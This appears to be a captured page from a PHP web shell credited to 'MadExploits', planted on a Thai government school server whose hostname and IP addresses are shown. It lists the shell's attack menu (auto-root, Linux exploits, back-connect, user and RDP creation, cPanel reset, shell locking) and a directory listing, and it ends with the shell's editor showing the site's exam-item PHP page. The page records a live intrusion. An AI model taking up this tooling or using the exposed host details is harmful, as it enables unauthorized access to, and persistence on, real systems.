Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
bets /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
add_score.php
1.58
KB
-rw-r--r--
add_test.php
9.11
KB
-rwxr-xr-x
curriculum.php
7.97
KB
-rwxr-xr-x
curriculum_view.php
25.22
KB
-rwxr-xr-x
examination_set.php
320
B
-rwxr-xr-x
export_to_excel.php
4.24
KB
-rw-r--r--
frm_add_test.php
1.77
KB
-rwxr-xr-x
indicator.php
37.07
KB
-rwxr-xr-x
item_display.php
6.68
KB
-rw-r--r--
khet_paper_report_1.php
61.73
KB
-rw-r--r--
khet_paper_report_2.php
65.56
KB
-rw-r--r--
khet_report_1.php
27.49
KB
-rwxr-xr-x
khet_report_1_mobile.php
8.38
KB
-rwxr-xr-x
khet_report_2.php
68.18
KB
-rwxr-xr-x
level_log.php
1.6
KB
-rw-r--r--
level_record.php
17.37
KB
-rw-r--r--
level_report_1.php
38.07
KB
-rw-r--r--
level_report_2.php
35.32
KB
-rw-r--r--
level_report_3.php
22.22
KB
-rw-r--r--
level_report_4.php
16.65
KB
-rw-r--r--
level_test.php
22.99
KB
-rw-r--r--
livesearch.php
721
B
-rwxr-xr-x
livesearch2.php
729
B
-rw-r--r--
livesearch3.php
756
B
-rw-r--r--
livesearch4.php
727
B
-rw-r--r--
livesearch5.php
1.16
KB
-rw-r--r--
livesearch6.php
1.41
KB
-rw-r--r--
master_test_report.php
16.2
KB
-rw-r--r--
permission.php
11.69
KB
-rwxr-xr-x
print_check.php
3.52
KB
-rw-r--r--
return_ajax_indicator.php
1.64
KB
-rwxr-xr-x
return_ajax_standard.php
805
B
-rwxr-xr-x
return_ajax_substance.php
1.36
KB
-rwxr-xr-x
sch_paper_report_1.php
62.36
KB
-rw-r--r--
sch_report_1.php
65.87
KB
-rwxr-xr-x
sch_report_1_mobile.php
10.62
KB
-rwxr-xr-x
school_limit.php
13.09
KB
-rw-r--r--
standard.php
19.24
KB
-rwxr-xr-x
student_paper_report_1.php
17.6
KB
-rw-r--r--
student_report_1.php
25.54
KB
-rwxr-xr-x
student_report_1_mobile.php
5.51
KB
-rwxr-xr-x
substance.php
16.58
KB
-rwxr-xr-x
test_admin.php
46.87
KB
-rwxr-xr-x
test_admin2.php
6.86
KB
-rw-r--r--
test_admin3.php
11.27
KB
-rw-r--r--
test_admin_book.php
75.57
KB
-rw-r--r--
test_admin_book2.php
19.74
KB
-rw-r--r--
test_import.php
7.86
KB
-rw-r--r--
test_item.php
93.56
KB
-rwxr-xr-x
test_master.php
46.2
KB
-rwxr-xr-x
test_qc.php
15.46
KB
-rw-r--r--
test_qc_person.php
8.05
KB
-rw-r--r--
test_sch.php
6.1
KB
-rwxr-xr-x
test_sch_2.php
26.76
KB
-rwxr-xr-x
test_student.php
34.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : item_display.php
<?php session_start(); if(!(isset($_SESSION['login_user_id']))){ if(!(isset($_SESSION['remote_user_office']))){ exit(); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php if(isset($_SESSION['user_os'])){ if($_SESSION['user_os']=='mobile'){ echo "<meta name = 'viewport' content = 'width = device-width'>"; } } ?> <style type="text/css"> <!-- .style1 { font-size: 12px; } --> </style> </head> <body> <?php require_once "../../../amssplus_connect.php"; require_once("../../../mainfile.php"); foreach($_GET as $system_key => $system_key_val) { $_GET["$system_key"] =mysqli_real_escape_string($connect,$system_key_val); } $sql_test = "select * from bets_item where id='$_GET[item_id]'"; $dbquery_test = mysqli_query($connect,$sql_test); $result = mysqli_fetch_array($dbquery_test); if($result['media_item']!=""){ $media_item_arr=explode('/',$result['media_item']); $media_item=$media_item_arr[3]; } if($result['doc_item']!=""){ $doc_item_arr=explode('/',$result['doc_item']); $doc_item=$doc_item_arr[3]; } if($result['solve_doc']!=""){ $solve_doc_arr=explode('/',$result['solve_doc']); $solve_doc=$solve_doc_arr[3]; } //sound if(($result['media_item']!="") or ($result['doc_item']!="")){ ?> <link rel="stylesheet" href="../../../jquery/themes/ui-lightness/jquery.ui.all.css"> <script src="../../../jquery/jquery-1.5.1.js"></script> <script src="../../../jquery/external/jquery.bgiframe-2.1.2.js"></script> <script src="../../../jquery/ui/jquery.ui.core.js"></script> <script src="../../../jquery/ui/jquery.ui.widget.js"></script> <script src="../../../jquery/ui/jquery.ui.mouse.js"></script> <script src="../../../jquery/ui/jquery.ui.draggable.js"></script> <script src="../../../jquery/ui/jquery.ui.position.js"></script> <script src="../../../jquery/ui/jquery.ui.resizable.js"></script> <script src="../../../jquery/ui/jquery.ui.dialog.js"></script> <?php if($_SESSION['user_os']=='mobile'){ ?> <script> // increase the default animation speed to exaggerate the effect $.fx.speeds._default = 300; $(function() { $( "#dialog" ).dialog({ height: 270, width: 375, minHeight: 255, minWidth: 285, autoOpen: false, show: "blind", hide: "explode", modal: true, resizable: false}); $( "#opener" ).click(function() { $( "#dialog" ).dialog( "open" ); return false; }); }); </script> <?php } else{ ?> <script> // increase the default animation speed to exaggerate the effect $.fx.speeds._default = 300; $(function() { $( "#dialog" ).dialog({ height: 400, width: 500, minHeight: 460, minWidth: 380, autoOpen: false, show: "blind", hide: "explode", modal: true, resizable: false}); $( "#opener" ).click(function() { $( "#dialog" ).dialog( "open" ); return false; }); }); </script> <?php } ?> <?php echo "<table width='30%' border='0' align='center'>"; echo "<tr><td align='center'>"; if($result['media_item']!=""){ $media_type=substr("$result[media_item]", -3); if($media_type=="mp3"){ $media_pic="sound_pic.png"; } else if($media_type=="mp4"){ $media_pic="video.jpg"; } else{ $media_pic="sound_pic.png"; } echo "<a id='opener' href='#'><img src=../images/$media_pic border='0'></a>"; } if($result['doc_item']!=""){ ?> <A HREF="javascript:void(0)" onclick="window.open('../upload_files/<?php echo $doc_item;?>','','width=900,height=650,scrollbars')" title="เอกสาร"><span style="text-decoration: none"><img src=../images/book.png border='0'></span></A> <?php } echo "</td></tr>"; echo "</table>"; ?> <div id="dialog" title="เสียง/วิดิโอ"> <?php if($result['media_item']!=""){ if($_SESSION['user_os']=='mobile'){ echo "<table border='0' align='center'>"; echo "<tr><td align='center'><embed src='../upload_files/$media_item' autoplay='true' width='300' height='200'></embed></td></tr>"; echo "</table>"; } else{ echo "<table width='30%' border='0' align='center'>"; echo "<tr><td align='center'><embed src='../upload_files/$media_item' autoplay='false' width='400' height='300'></embed></td></tr>"; echo "</table>"; } } ?> </div> <?php } //end sound //อธิบายเฉลยข้อสอบ if($result['solve_doc']!=""){ ?> <div align='center'> <A HREF="javascript:void(0)" onclick="window.open('../upload_files/<?php echo $solve_doc;?>','','width=900,height=650,scrollbars')" title="เอกสาร"><span style="text-decoration: none"><img src=../images/solve.png border='0'></span></A> </div> <?php } if($result['item_type']==1){ $item_pic_arr=explode('/',$result['pic_item']); $item_pic=$item_pic_arr[3]; echo "<table width='75%' border='0' align='center'>"; echo "<tr></td><td align='center'>"; $ori_size=getimagesize("../upload_files/$item_pic"); $ori_w=$ori_size[0]; if($ori_w>700){ echo "<img src='../upload_files/$item_pic' border='0' width='700'>"; } else{ echo "<img src='../upload_files/$item_pic' border='0'>"; } echo "</td></tr>"; echo "</table>"; } if($result['item_type']==2){ echo "<table width='75%' border='0' align='center'>"; echo "<tr><td align='right' width='100'><font size='4' color='#000066'><b>คำถาม :</b></font></td><td><font size='3'>$result[question]</font></td></tr>"; if($result['answer_num']>=1){ echo "<tr><td align='right'><font size='3' color='#000066'><b>1. </b></font></td><td><font size='3'>$result[answer1]</font></td></tr>"; } if($result['answer_num']>=2){ echo "<tr><td align='right'><font size='3' color='#000066'><b>2. </b></font></td><td><font size='3'>$result[answer2]</font></td></tr>"; } if($result['answer_num']>=3){ echo "<tr><td align='right'><font size='3' color='#000066'><b>3. </b></font></td><td><font size='3'>$result[answer3]</font></td></tr>"; } if($result['answer_num']>=4){ echo "<tr><td align='right'><font size='3' color='#000066'><b>4. </b></font></td><td><font size='3'>$result[answer4]</font></td></tr>"; } if($result['answer_num']==5){ echo "<tr><td align='right'><font size='3' color='#000066'><b>5. </b></font></td><td><font size='3'>$result[answer5]</font></td></tr>"; } echo "</table>"; } ?> </body> </html>
Close